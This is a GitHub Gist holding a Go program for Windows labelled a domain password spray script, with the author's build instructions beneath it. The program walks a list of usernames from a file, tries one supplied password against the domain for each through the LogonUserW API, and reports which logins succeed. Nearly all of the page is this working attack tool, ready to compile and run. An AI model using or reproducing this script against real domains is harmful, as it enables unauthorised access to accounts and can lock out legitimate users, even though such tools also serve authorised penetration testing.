Last active
June 6, 2023 11:46
-
-
Save timsonner/71a043847a2c52e76b6517e3a151e9d2 to your computer and use it in GitHub Desktop.
GoLang. Domain password spray script. Runs on Windows.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "io/ioutil" | |
| "strings" | |
| "syscall" | |
| "unicode/utf16" | |
| "unsafe" | |
| "golang.org/x/text/encoding/unicode" | |
| ) | |
| const ( | |
| LOGON32_LOGON_NETWORK = 3 | |
| LOGON32_PROVIDER_DEFAULT = 0 | |
| ERROR_LOGON_FAILURE uint32 = 0x52e | |
| ) | |
| var ( | |
| modadvapi32 = syscall.NewLazyDLL("advapi32.dll") | |
| modkernel32 = syscall.NewLazyDLL("kernel32.dll") | |
| procLogonUser = modadvapi32.NewProc("LogonUserW") // LogonUserW function from advapi32.dll | |
| procCloseHandle = modkernel32.NewProc("CloseHandle") // CloseHandle function from kernel32.dll | |
| ) | |
| func main() { | |
| // Prompt the user for domain and password | |
| var domain, password string | |
| fmt.Print("Domain: ") | |
| fmt.Scanln(&domain) | |
| fmt.Print("Password: ") | |
| fmt.Scanln(&password) | |
| // Read the contents of the users.txt file | |
| data, err := ioutil.ReadFile("users.txt") | |
| if err != nil { | |
| fmt.Println("Error reading file:", err) | |
| return | |
| } | |
| // Decode the file content using UTF-16 little-endian encoding | |
| decoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewDecoder() | |
| decodedData, err := decoder.Bytes(data) | |
| if err != nil { | |
| fmt.Println("Error decoding file:", err) | |
| return | |
| } | |
| // Split the file contents into separate lines | |
| lines := strings.Split(string(decodedData), "\n") | |
| // Parse each line and convert it to UTF-16 string | |
| for _, line := range lines { | |
| line = strings.TrimSpace(line) | |
| if line == "" { | |
| continue | |
| } | |
| username := utf16.Encode([]rune(line)) | |
| // Print the parsed UTF-16 string | |
| // fmt.Println(syscall.UTF16ToString(username)) | |
| // Attempt to authenticate against the domain controller | |
| err = LogonUser(syscall.UTF16ToString(username), domain, password) | |
| if err != nil { | |
| fmt.Printf("Authentication failed for username '%s': %v\n", syscall.UTF16ToString(username), err) | |
| } else { | |
| fmt.Printf("Authentication successful for username '%s'\n", syscall.UTF16ToString(username)) | |
| } | |
| } | |
| } | |
| func LogonUser(username, domain, password string) error { | |
| usr, _ := syscall.UTF16PtrFromString(username) | |
| dom, _ := syscall.UTF16PtrFromString(domain) | |
| pwd, _ := syscall.UTF16PtrFromString(password) | |
| var handle syscall.Handle | |
| ret, _, err := procLogonUser.Call( | |
| uintptr(unsafe.Pointer(usr)), | |
| uintptr(unsafe.Pointer(dom)), | |
| uintptr(unsafe.Pointer(pwd)), | |
| LOGON32_LOGON_NETWORK, | |
| LOGON32_PROVIDER_DEFAULT, | |
| uintptr(unsafe.Pointer(&handle)), | |
| ) | |
| if ret == 0 { | |
| if errno, ok := err.(syscall.Errno); ok && errno == syscall.Errno(ERROR_LOGON_FAILURE) { | |
| return fmt.Errorf("invalid credentials") | |
| } | |
| return err | |
| } | |
| defer procCloseHandle.Call(uintptr(handle)) | |
| return nil | |
| } |
Author
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
You’ll need to run:
go mod init module
go get -u golang.org/x/text/encoding/unicode
That creates a go.mod file, then installs the unicode package. Its a hack to get the compiler to stop yelling at you.
go run pass-spray.go
-or-
go build pass-spray.go